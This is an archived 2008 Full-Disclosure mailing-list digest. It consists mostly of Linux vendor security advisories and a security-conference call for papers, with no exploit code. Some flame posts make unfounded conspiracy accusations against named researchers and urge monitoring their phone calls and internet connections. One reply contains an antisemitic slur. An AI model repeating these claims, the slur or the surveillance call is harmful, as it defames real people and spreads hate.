- About Bkis : Bkis (Bach Khoa Internetwork Security) is Vietnam's leading center in researching and deploying network security software and solutions.
- Website : http://security.bkis.vn
- Mail : svrt[at]bkav.com.vn

-------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080905/b0c578f7/attachment.html From pinar at pardus.org.tr Fri Sep 5 14:49:30 2008 From: pinar at pardus.org.tr (Pardus Security Team) Date: Fri, 05 Sep 2008 16:49:30 +0300 Subject: [Full-disclosure] [PLSA 2008-36] Ffmpeg: Multiple vulnerabilities Message-ID: <48C138EA.6080708@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-36 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-05 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= Multiple vulnerabilities have been detected in ffmpeg. Please update your packages to the latest versions. Description =========== * Free avctx->rc_eq in avcodec_close(). Fixes a memory leak. * Buffer overflow in libavcodec/dca.c (patch by Alexander E. Patrakov). * Prevent the dts generation code from being executed when delay is > MAX_REORDER_DELAY; this fixes an overflow in AVStream->pts_buffer (in libavformat/utils.c). * TCP/UDP memory leak. Affected packages: Pardus 2008: mplayer, all before 0.0_20080825-92-11 ffmpeg, all before 0.4.9_20080825-46-14 Resolution ========== There are update(s) for mplayer, ffmpeg. You can update them via Package Manager or with a single command from console: pisi up mplayer ffmpeg References ========== * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016011.html * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016012.html * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016352.html * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016136.html ------------------------------------------------------------------------ From frankruder at hotmail.com Fri Sep 5 19:41:13 2008 From: frankruder at hotmail.com (cocoruder.) 
Date: Fri, 5 Sep 2008 18:41:13 +0000 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: <d65cd4390809050045k7037cba7g7bb8de93e5e44f5@mail.gmail.com> References: <d65cd4390809050045k7037cba7g7bb8de93e5e44f5@mail.gmail.com> Message-ID: <BAY129-W4854462690D76627C46F74CB580@phx.gbl> cool man! cool the Chinese guys! welcome to my blog:http://ruder.cdut.net Date: Fri, 5 Sep 2008 15:45:01 +0800From: smaillist at gmail.comTo: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.ukSubject: [Full-disclosure] XCon 2008 Call for Paper XCon 2008 Call for Paper Nov. 18th ?C 19th, 2008, Beijing, PRC (http://xcon.xfocus.net) XCon is wholeheartedly expecting papers from those who are passionate about information security technique and their participation and sharing of the conference. Attenders Anyone who loves information security, including information security experts and fans, network administrators, network security consultants, CIO, hacker technique fans, etc. Location : Beijing Jintai Hotel http://www.bjjintaihotel.com/ Topics include (but not limited to): --- Security in new fields - Vista - Web 2.0 - 3G/4G network - Mobile Handset - Banks & financial institutes - GRPS & CDMA - Routing device - Visualization technique --- Application security - Web application vulnerability research - Application reverse engineering and related automated tools - Database security & attacks - Protocol security & exploitation - Advanced Trojans, worms and backdoor technique - Encryption & decryption technique --- Intrusion detection/forensics analysis - File system analysis & recovery - Real-time data structure recovery - Reverse engineering (malicious code analysis technique, vulnerability research) - Traffic analysis - Intrusion detection and anti-detection technique --- Wireless & VoIP security - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS - PDA & mobile protocol analysis - Palm, Pocket Pc - Wireless gateway - VoIP security & vulnerability analysis - WLANs 
hardening & vulnerability analysis ---P2P technique - Instant messenger (MSN, Skype, ICQ, etc.) - P2P application (BT, Emule, Thunder, online multi-media, etc.) Paper Submission The submitted paper will include the following information : 1) Brief introduction to the topic. Please clarify if the topic has been previously publicized, and if so, the distribution scope. 2) Speaker's self introduction and work experience. 3) Speaker's contact information: full name, alias, nationality, network nickname, e-mail, tel, fax, current working place and company, IM (MSN, ICQ, YM, AIM or others). 4) Presentation details: - duration - if any new tool/vulnerability/exploit will be released 5) The paper must include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format. All the papers will be submitted to cfp at xfocus.org for preliminary selection. The deadline for submission is Oct. 10th, 2008, and deadline for confirmation is Oct. 20th, 2008. No matter if the paper is accepted, we will officially inform you by the provided contact method within 5 working days. Some important dates * Deadline for submission ?C Oct. 10th, 2008 * Deadline for confirmation ?C Oct. 20th, 2008 Speakers' privilege If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon. The speakers will be provided with : - Round-trip plane ticket (Economy class, and one person only. Foreign speakers up to 1,200 USD) - Two days' food and accommodation - Invitation to celebration party - Tour to some well-known scenic spots and historical sites in Beijing, taste of Chinese flavored food - Luck drawImportant : - Speakers must provide corresponding invoice or credential. - XCon reserves the right of final explanation. For more information about the conference, please contact xcon at xfocus.org or professional XCon2008 organizer. 
MSN: xfocusxcon at hotmail.com; tel : 086-010-62029792 Application In order to attend the conference, please register at XCon website (http://xcon.xfocus.net) or directly contact the organizer mentioned above. We will offer different discounts according to the time of application. Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation and other service. Other information : All the information about XCon will be released on XCon and Xfocus website. Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents. Thank you for your support on XCon ! From hannibal at switched.com Fri Sep 5 20:10:11 2008 From: hannibal at switched.com (hannibal) Date: Fri, 05 Sep 2008 20:10:11 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> <!&!AAAAAAAAAAAYAAAAAAAAAAVYH6z3dz1PlKZBgMlD+37CgAAAEAAAAFVn+I71EzVNkkthOpmt9sMBAAAAAA==@brainiacghost.co.uk> <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> Message-ID: <48C18413.2090304@switched.com> n3td3v wrote: > On Thu, Sep 4, 2008 at 5:46 PM, Chris Pritchard > <mailinglist at brainiacghost.co.uk> wrote: > >> I don't think it's "your" list, and even if it was, you didn't have to be so >> rude about it >> >> > > It's Gadi Evron's list because Mossad told him to make it so. 
Who's > really in control of the propaganda on this mailing list, Gadi Evron, > he gets quoted in all the journalist articles as soon as he spams some > new claim about which country is to blame for a cyber attack, and the > journalists believe him, then it becomes the true version of events... > even if it's not really. > > That's why I think it's time for journalists to rethink who the > "trusted" security professionals are and who is gaming the system for > political outcomes, that an intelligence agency has told them to make > happen. > > It's true that Full-Disclosure is a powerful platform, and all it needs > is a couple of Gadi Evrons and Dancho Danchevs spamming what the > "truth" is and everyone goes with it. > > I find it suspicious that Dancho Danchev was a standard blogspot > blogger one week, then after about two posts on Full-Disclosure was > suddenly upgraded to the Zdnet zero-day blog... splitting out more > information about cyber attacks and which country is to blame. > > We've got to keep an eye on the so-called "trusted" security > professionals now, because they are trying to game the system for a > political end, the intelligence services in the U.S. are responsible for a > number of cyber attacks, which have been blamed on other countries and > entities. > > I posted proof that Marcus Sachs wants to influence the political system > in America at the highest level of government, so his group can get > lots of money. > > So we know the mindset which is going on right now, so it's not like I > haven't posted proof, intelligence agencies and certain "trusted" > security professionals want control of "cyber" and they will do > anything they can to get it. We must proceed with caution and think > carefully about who is telling the truth before quoting "trusted" > security professionals from now on. > > The Marcus Sachs Youtube video is extremely damaging for the security > industry, what the true intentions are of some people and how power > hungry they are. 
Would Marcus Sachs, Gadi Evron and Dancho Danchev etc > tell a lie to become more powerful, you bet they would, especially if > being leaned on by certain rogue elements of the intelligence > agencies. > > The truth is, there are people out there looking to ramp up cyber > security as a national security agenda, even though naturally cyber > security is nowhere near being a national security issue, they still > want to ramp it up anyway because it will give them power and money in > an area that has yet to be decided upon. > > "Cyber" is like a new area, and folks are racing to become the leaders > of cyber before one another, that's why it's a dangerous time right now > and there is lots of propaganda flying around the mailing lists as > soon as a cyber attack happens, which are probably false flags anyway > created by the very people who are on Youtube videos looking for ways > to become powerful with lots of money. > > I found the Cnet news article that goes with the Youtube video, we > have *some* of the people that are power hungry in the photograph > that's on the Cnet News article. > > 'Cybersecurity commission' to proffer advice to next president > http://news.cnet.com/8301-13578_3-10009603-38.html > > We've got to follow these people around in real life, monitor their > internet connection and phone calls to see who they are having discussions > with, so no foul play happens because they are so desperate to impress > the next administration. > > All the best, > > n3td3v How does this pertain to the Google Chrome Browser vuln? We all know that Evron is a moronic jew, who cares? From marcio.barbado at gmail.com Fri Sep 5 20:41:44 2008 From: marcio.barbado at gmail.com (M.B.Jr.) 
Date: Fri, 5 Sep 2008 16:41:44 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <8a6b8e350809022134w232c17cbrb7c7e31e2e4f5e8@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <8a6b8e350809022134w232c17cbrb7c7e31e2e4f5e8@mail.gmail.com> Message-ID: <2df3b0cb0809051241m338eacabw114614293cfcfd8f@mail.gmail.com> Well, "things" keep happening to Safari as a matter of fact. On 9/3/08, James Matthews <nytrokiss at gmail.com> wrote: > The same thing happened to safari when it came out on windows. > > > On Tue, Sep 2, 2008 at 5:13 PM, Larry Seltzer <larry at larryseltzer.com> > wrote: > > > Holy crap, a crash bug in a beta browser! > > > > Larry Seltzer > > eWEEK.com Security Center Editor > > http://security.eweek.com/ > > http://blogs.pcmag.com/securitywatch/ > > Contributing Editor, PC Magazine > > larry.seltzer at ziffdavisenterprise.com > > > > > > > > > > > > -----Original Message----- > > From: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure-bounces at lists.grok.org.uk] On > Behalf Of Rishi > > Narang > > Sent: Tuesday, September 02, 2008 7:51 PM > > To: full-disclosure at lists.grok.org.uk > > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > > > > Hi, > > > > --------------------------------------------------- > > Software: > > Google Chrome Browser 0.2.149.27 > > > > Tested: > > Windows XP Professional SP3 > > > > Result: > > Google Chrome Crashes with All Tabs > > > > Problem: > > An issue exists in how chrome behaves with undefined-handlers in > > chrome.dll version 0.2.149.27. A crash can result without user > > interaction. When a user is made to visit a malicious link, which has an > > undefined handler followed by a 'special' character, the chrome crashes > > with a Google Chrome message window "Whoa! Google Chrome has crashed. > > Restart now?". 
It fails in dealing with the POP EBP instruction when > > pointed out by the EIP register at 0x01002FF4. > > > > Proof of Concept: > > http://evilfingers.com/advisory/google_chrome_poc.php > > > > Credit: > > Rishi Narang (psy.echo) > > www.greyhat.in > > www.evilfingers.com > > --------------------------------------------------- > > > > -- > > Thanks & Regards, > > Rishi Narang | Security Researcher > > Founder, GREYHAT Insight > > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > > www.greyhat.in > > > > ... eschew obfuscation, espouse elucidation. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > http://www.goldwatches.com/ > -- Marcio Barbado, Jr. 
From xploitable at gmail.com Fri Sep 5 21:53:27 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 5 Sep 2008 21:53:27 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <48C18413.2090304@switched.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> <!&!AAAAAAAAAAAYAAAAAAAAAAVYH6z3dz1PlKZBgMlD+37CgAAAEAAAAFVn+I71EzVNkkthOpmt9sMBAAAAAA==@brainiacghost.co.uk> <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> <48C18413.2090304@switched.com> Message-ID: <4b6ee9310809051353j4a901b01n721c073d7278af9b@mail.gmail.com> On Fri, Sep 5, 2008 at 8:10 PM, hannibal <hannibal at switched.com> wrote: > We all know that Evron is a moronic jew, who cares? > How should the community deal with Gadi Evron emails? Should we be shooting for a complete ban of cyber politics as well as normal politics which is already banned? If people want to talk cyber politics then the community could set up a cyber-politics mailing list so we can rant to each other all day about cyber politics. And it would get Gadi Evron and n3td3v off Full-Disclosure, and that's got to be a good thing. 
All the best, n3td3v From py at gentoo.org Fri Sep 5 21:56:31 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Fri, 05 Sep 2008 22:56:31 +0200 Subject: [Full-disclosure] [ GLSA 200809-05 ] Courier Authentication Library: SQL injection vulnerability Message-ID: <48C19CFF.1030808@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Courier Authentication Library: SQL injection vulnerability Date: September 05, 2008 Bugs: #225407 ID: 200809-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== An SQL injection vulnerability has been discovered in the Courier Authentication Library. Background ========== The Courier Authentication Library is a generic authentication API that encapsulates the process of validating account passwords. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/courier-authlib < 0.60.6 >= 0.60.6 Description =========== It has been discovered that some input (e.g. the username) passed to the library is not properly sanitised before being used in SQL queries. Impact ====== A remote attacker could provide specially crafted input to the library, possibly resulting in the remote execution of arbitrary SQL commands. NOTE: Exploitation of this vulnerability requires that a MySQL database is used for authentication and that a non-Latin character set is selected. Workaround ========== There is no known workaround at this time. 
Resolution ========== All Courier Authentication Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/courier-authlib-0.60.6" References ========== [ 1 ] CVE-2008-2667 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2667 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 
From security at mandriva.com Fri Sep 5 23:49:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 05 Sep 2008 16:49:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:188 ] tomcat5 Message-ID: <E1Kbk6u-0000Ts-Hx@titan.mandriva.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:188 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tomcat5 Date : September 5, 2008 Affected: 2008.0, 2008.1 _______________________________________________________________________ Problem Description: A number of vulnerabilities have been discovered in the Apache Tomcat server: The default catalina.policy in the JULI logging component did not restrict certain permissions for web applications which could allow a remote attacker to modify logging configuration options and overwrite arbitrary files (CVE-2007-5342). A cross-site scripting vulnerability was found in the HttpServletResponse.sendError() method which could allow a remote attacker to inject arbitrary web script or HTML via forged HTTP headers (CVE-2008-1232). A cross-site scripting vulnerability was found in the host manager application that could allow a remote attacker to inject arbitrary web script or HTML via the hostname parameter (CVE-2008-1947). A traversal vulnerability was found when using a RequestDispatcher in combination with a servlet or JSP that could allow a remote attacker to utilize a specially-crafted request parameter to access protected web resources (CVE-2008-2370). 
A traversal vulnerability was found when the 'allowLinking' and 'URIencoding' settings were activated which could allow a remote attacker to use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process (CVE-2008-2938). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 _______________________________________________________________________ Updated Packages: 
_______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIwYsKmqjQ0CJFipgRApJjAKCVZ1XtEGoADQcp8l/m1ECSRstnjACg4qE8 j+sCdAEJN0CXvurmFcjUvNU= =+kFf -----END PGP SIGNATURE----- From xploitable at gmail.com Sat Sep 6 00:36:14 2008 From: xploitable at gmail.com (n3td3v) Date: Sat, 6 Sep 2008 00:36:14 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' Message-ID: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> "McKinnon is being used as a scapegoat in a bid to secure extra funding to protect US military networks, according to Bevan, who reckons a commercial organisation would never get away with such trickery." "I think it's all about timing and whether or not the hacker will make a good scapegoat whilst allowing the administration to request further money. The fear machine can keep churning out propaganda as per normal, but don't expect those machines to actually get better security." http://www.theregister.co.uk/2008/09/03/mckinnon_bevan_interview_analysis/ This is what I was talking about with the Marcus Sachs Youtube video, they are going to be using trickery to get money and impress the next administration. 
I feel sorry for Gary McKinnon that he is being used by the Marcus Sachs mindset who only care about money and power, they don't care about a man's life. All the best, n3td3v From xploitable at gmail.com Sat Sep 6 01:22:32 2008 From: xploitable at gmail.com (n3td3v) Date: Sat, 6 Sep 2008 01:22:32 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> Message-ID: <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> On Sat, Sep 6, 2008 at 12:36 AM, n3td3v <xploitable at gmail.com> wrote: > "McKinnon is being used as a scapegoat in a bid to secure extra > funding to protect US military networks, according to Bevan, who > reckons a commercial organisation would never get away with such > trickery." > > "I think it's all about timing and whether or not the hacker will make > a good scapegoat whilst allowing the administration to request further > money. The fear machine can keep churning out propaganda as per > normal, but don't expect those machines to actually get better > security." > > http://www.theregister.co.uk/2008/09/03/mckinnon_bevan_interview_analysis/ > > This is what I was talking about with the Marcus Sachs Youtube video, > they are going to be using trickery to get money and impress the next > administration. > > I feel sorry for Gary McKinnon that he is being used by the Marcus > Sachs mindset who only care about money and power, they don't care > about a man's life. > > All the best, > > n3td3v > Here is the Marcus Sachs Youtube video, I forgot to add it http://www.youtube.com/watch?v=FSUPTZVlkyU Maybe the Gary McKinnon lawyers could use it to prove the U.S. mindset right now as a last ditch hope. We can't allow a man to go to jail for life, if the reason is only for Marcus Sachs to get cyber security funding and power, that's just sickening. 
http://freegary.org.uk/ All the best, n3td3v From pinar at pardus.org.tr Sat Sep 6 02:11:45 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:11:45 +0300 Subject: [Full-disclosure] [PLSA 2008-38] Wireshark: Denial of Service Message-ID: <48C1D8D1.2020202@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-38 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= Some vulnerabilities have been reported in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service). Description =========== 1) Various errors within epan/dissectors/packet-ncp2222.inc can be exploited to cause e.g. a crash or an infinite loop via specially crafted NCP packets. 2) An error while uncompressing zlib-compressed packet data can be exploited to cause a crash via specially crafted packets. Affected packages: Pardus 2008: wireshark, all before 1.0.3-22-4 Pardus 2007: wireshark, all before 1.0.3-22-18 Resolution ========== There are update(s) for wireshark. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up wireshark Pardus 2007: pisi up wireshark References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8119 * http://www.wireshark.org/security/wnpa-sec-2008-05.html * http://secunia.com/advisories/31674 ------------------------------------------------------------------------ -- Pınar Yanardağ 
Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:12:10 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:12:10 +0300 Subject: [Full-disclosure] [PLSA 2008-37] Django: Cross Site Scripting Message-ID: <48C1D8EA.1010409@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-37 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= A vulnerability has been reported in Django, which can be exploited by malicious people to conduct cross-site request forgery attacks. Description =========== The vulnerability is caused due to the Django administration application not performing any validity checks to verify requests when re-authenticating the user. This can be exploited to delete and edit data when a user who is not logged in visits, e.g., a malicious web site and is then enticed to log in to the application. Affected packages: Pardus 2008: Django, all before 1.0-15-2 Pardus 2007: Django, all before 0.96.3-15-11 Resolution ========== There are update(s) for Django. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up Django Pardus 2007: pisi up Django References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8116 * http://www.djangoproject.com/weblog/2008/sep/02/security * http://secunia.com/advisories/31729 ------------------------------------------------------------------------ -- Pınar Yanardağ 
Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:12:23 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:12:23 +0300 Subject: [Full-disclosure] [PLSA 2008-39] Clamav: Multiple Vulnerabilities Message-ID: <48C1D8F7.1080401@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-39 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= Multiple vulnerabilities have been discovered in Clamav, including a DoS (Denial of Service) vulnerability and memory leaks. Description =========== The first vulnerability is caused due to an error in libclamav/chmunpack.c when processing malformed CHM files. This can be exploited to cause an invalid memory access via a specially crafted CHM file. The others are as follows: * Out-of-memory null dereference (bb#1141) CVE-2008-3912 * Possible invalid memory access (bb#1089) CVE-2008-1389 * Error path memory leaks CVE-2008-3913 * Fd leaks (bb#1141) CVE-2008-3914 Affected packages: Pardus 2008: clamav, all before 0.93.3-28-2 Pardus 2007: clamav, all before 0.93.3-30-29 Resolution ========== There are update(s) for clamav. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up clamav Pardus 2007: pisi up clamav References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8110 * http://int21.de/cve/CVE-2008-1389-clamav-chd.html * http://secunia.com/advisories/31725 ------------------------------------------------------------------------ -- Pınar Yanardağ 
Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:12:34 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:12:34 +0300 Subject: [Full-disclosure] [PLSA 2008-40] Postfix: Denial of Service Message-ID: <48C1D902.1070102@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-40 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 1 Type: Local ------------------------------------------------------------------------ Summary ======= A security issue has been reported in Postfix, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Description =========== The security issue is caused due to Postfix leaking the epoll file descriptor when executing non-Postfix commands, which can be exploited to cause a DoS. The security issue only affects Postfix 2.4 or later in combination with epoll (e.g. Linux 2.6). Affected packages: Pardus 2008: postfix, all before 2.5.4-21-5 Resolution ========== There are update(s) for postfix. You can update them via Package Manager or with a single command from console: pisi up postfix References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8114 * http://www.postfix.org/announcements/20080902.html * http://secunia.com/advisories/31716/ ------------------------------------------------------------------------ -- Pınar Yanardağ 
Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:13:06 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:13:06 +0300 Subject: [Full-disclosure] [PLSA 2008-41] Emacs: Malicious code execution Message-ID: <48C1D922.6090301@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-41 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= Romain Francoise has found a security risk in a feature of GNU Emacs related to how Emacs interacts with Python. Description =========== The vulnerability may allow an attacker to run malicious code if the user runs the Emacs command `run-python' while the current directory is world-writable, or if the user toggles `eldoc-mode' and visits a Python source file in a world-writable directory. Affected packages: Pardus 2008: emacs, all before 23.0.60_20080624-22-6 Pardus 2007: emacs, all before 22.1-17-17 Resolution ========== There are update(s) for emacs. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up emacs Pardus 2007: pisi up emacs References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8128 * http://lists.gnu.org/archive/html/emacs-devel/2008-09/msg00215.html * http://www.opensubscriber.com/message/emacs-diffs at gnu.org/9983157.html ------------------------------------------------------------------------ -- Pınar Yanardağ 
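The Postfix issue in PLSA 2008-40 above is a descriptor that outlives an exec into a non-Postfix command. The C program below is an added example, not Postfix code, contrasting an epoll descriptor created with epoll_create() (inheritable by any exec'd child) with one created via epoll_create1(EPOLL_CLOEXEC) or retrofitted with FD_CLOEXEC; it assumes Linux and /bin/sh.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/epoll.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if fd lacks FD_CLOEXEC (it would be inherited by any exec'd
 * program), 0 if it is close-on-exec, -1 if fd is not open. */
int fd_inheritable_on_exec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return (flags & FD_CLOEXEC) ? 0 : 1;
}

/* The leaky pattern: epoll_create() has no flags argument, so the
 * descriptor stays inheritable unless the caller remembers to fix it. */
int make_epoll_legacy(void)
{
    return epoll_create(16); /* size hint, ignored on modern kernels */
}

/* The hardened pattern: mark the descriptor close-on-exec atomically at
 * creation time (epoll_create1 exists since Linux 2.6.27). */
int make_epoll_cloexec(void)
{
    return epoll_create1(EPOLL_CLOEXEC);
}

/* Retrofit for descriptors created the old way. */
int mark_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags < 0)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC);
}

/* Empirical check: fork and exec /bin/sh, which tries to dup the numbered
 * descriptor onto its stdout. The shell exits 0 only if the descriptor was
 * still open after execve(), i.e. it leaked into the child.
 * Returns 1 (leaked), 0 (closed on exec) or -1 (fork/wait failed). */
int fd_visible_after_exec(int fd)
{
    char cmd[64];
    snprintf(cmd, sizeof cmd, ": >&%d", fd);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Silence the shell's "Bad file descriptor" diagnostic. */
        int devnull = open("/dev/null", O_WRONLY);
        if (devnull >= 0) {
            dup2(devnull, STDERR_FILENO);
            close(devnull);
        }
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 1 : 0;
}

int main(void)
{
    int leaky = make_epoll_legacy();
    int safe = make_epoll_cloexec();
    assert(leaky >= 0 && safe >= 0);

    printf("epoll_create():               inheritable=%d leaked=%d\n",
           fd_inheritable_on_exec(leaky), fd_visible_after_exec(leaky));
    printf("epoll_create1(EPOLL_CLOEXEC): inheritable=%d leaked=%d\n",
           fd_inheritable_on_exec(safe), fd_visible_after_exec(safe));

    /* Fixing the legacy descriptor after the fact closes the hole too. */
    assert(mark_cloexec(leaky) == 0);
    printf("after FD_CLOEXEC retrofit:    inheritable=%d leaked=%d\n",
           fd_inheritable_on_exec(leaky), fd_visible_after_exec(leaky));

    close(leaky);
    close(safe);
    return 0;
}
```

The same fcntl check applies to any long-lived descriptor (sockets, database handles) in a daemon that spawns external commands; a leaked descriptor lets the child hold or exhaust a resource the parent depends on.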
Pardus Security Team http://security.pardus.org.tr

From www417 at gmail.com Sat Sep 6 07:31:12 2008
From: www417 at gmail.com (www417)
Date: Sat, 6 Sep 2008 14:31:12 +0800
Subject: [Full-disclosure] XCon 2008 Call for Paper
In-Reply-To: <d65cd4390809050141x73891019x632b5f16b63e9d57@mail.gmail.com>
